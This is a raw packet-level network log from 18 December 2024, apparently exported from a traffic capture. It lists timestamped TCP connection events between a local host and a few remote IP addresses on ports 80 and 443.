                                                                                                                                                                  Dec 18, 2024 11:09:19.793379068 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.794320107 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.794333935 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.794361115 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.794383049 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.795516014 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.795557976 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.796582937 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.796616077 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.796624899 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.796628952 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.796652079 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.796672106 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.797801018 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.797847986 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.798712969 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.798758984 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.799052954 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.799097061 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.799376011 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.799417973 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.800216913 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.800256014 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.800266981 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.800296068 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.801506042 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.801520109 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.801556110 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.801573038 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.802778006 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.802792072 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.802822113 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.802840948 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.803796053 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.803839922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.804126024 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.804168940 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.805002928 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.805047989 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.805366993 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.805406094 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.806153059 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.806206942 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.806396008 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.806440115 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.807379007 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.807423115 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.807545900 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.807588100 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.808587074 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.808599949 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.808645964 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.809706926 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.809753895 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.810404062 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.810450077 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.810962915 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.810976028 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.811005116 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.811026096 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.812144995 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.812186956 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.812318087 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.812357903 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.813394070 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.813407898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.813433886 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.813455105 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.814506054 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.814518929 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.814554930 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.815926075 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.815974951 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.816342115 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.816382885 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.816880941 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.816900015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.816920996 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.816941023 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.818269014 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.818310976 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.819341898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.819384098 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.819466114 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.819504976 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.820034027 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.820075989 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.820590973 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.820633888 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.820804119 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.820847034 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.822798967 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.822819948 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.822861910 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.822869062 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.823045969 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.823045969 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.824342966 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.824362040 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.824393034 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.824415922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.825304031 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.825315952 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.825347900 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.826508045 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.826520920 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.826550961 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.826575994 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.827584982 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.827627897 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.828252077 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.828294039 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.828804016 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.828815937 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.828843117 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.828860998 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.830715895 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.830729008 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.830759048 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.830775976 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.831496954 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.831510067 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.831700087 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.831700087 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.833209038 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.833223104 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.833257914 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.833559990 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.833571911 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.833597898 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.833623886 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.835131884 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.835144997 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.835174084 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.835191011 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.835963964 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.835977077 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.836009026 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.837407112 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.837419033 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.837451935 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.838357925 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.838402033 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.838553905 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.838596106 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.839626074 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.839667082 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.839739084 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.839777946 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.840744019 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.840756893 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.840786934 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.842029095 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.842067957 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.843168020 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.843179941 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.843193054 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.843208075 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.843230009 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.844436884 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.844449043 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.844479084 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.844501972 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.845640898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.845653057 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.845684052 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.845700979 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.846698046 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.846710920 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.846740961 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.846756935 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.847898006 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.847944021 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.848134041 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.848174095 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.849200010 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.849241972 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.849550962 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.849589109 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.850241899 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.850289106 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.978926897 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.978945017 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.979011059 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.979511023 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.979553938 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.980442047 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.980454922 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.980482101 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.980504990 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.980621099 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.980664968 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.981651068 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.981694937 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.982616901 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.982659101 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.982913017 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.982955933 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.984065056 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.984077930 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.984107018 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.984122992 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.984504938 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.984546900 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.985224009 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.985264063 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.986526012 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.986538887 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.986567020 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.986591101 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.986943960 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.986989975 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.987670898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.987684011 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.987710953 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.987729073 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.988791943 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.988835096 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.989069939 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.989113092 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.990012884 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.990057945 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.990139008 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.990178108 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.991199970 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.991261005 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.991367102 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.991413116 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.992389917 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.992403984 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.992438078 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.993807077 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.993851900 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.994740963 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.994786978 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.994790077 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.994802952 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.994836092 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.996064901 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.996079922 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.996110916 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.996136904 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.997190952 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.997204065 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.997237921 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.998588085 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.998600006 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.998639107 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.999620914 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.999663115 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.000170946 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.000215054 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.000735998 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.000782013 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.001038074 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.001082897 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.001976013 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.002021074 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.002091885 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.002136946 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.003145933 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.003191948 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.003210068 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.003249884 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.004350901 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.004398108 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.004648924 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.004695892 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.005498886 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.005549908 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.006468058 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.006520987 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.006661892 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.006711006 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.006752014 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.006802082 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:20.007878065 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:20.007930040 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:22.190730095 CET4988880192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:22.191117048 CET4990780192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:22.310673952 CET8049907185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:22.310805082 CET4990780192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:22.310839891 CET8049888185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:22.311016083 CET4988880192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:22.312747002 CET4990780192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:22.432233095 CET8049907185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:23.641473055 CET8049907185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:23.641530037 CET4990780192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:23.644260883 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:23.644675970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:23.704062939 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:23.704128027 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:23.704206944 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:23.705461025 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:23.705476046 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:23.764492035 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:23.764508963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:23.764564037 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:23.764605999 CET4991280192.168.2.631.41.244.11
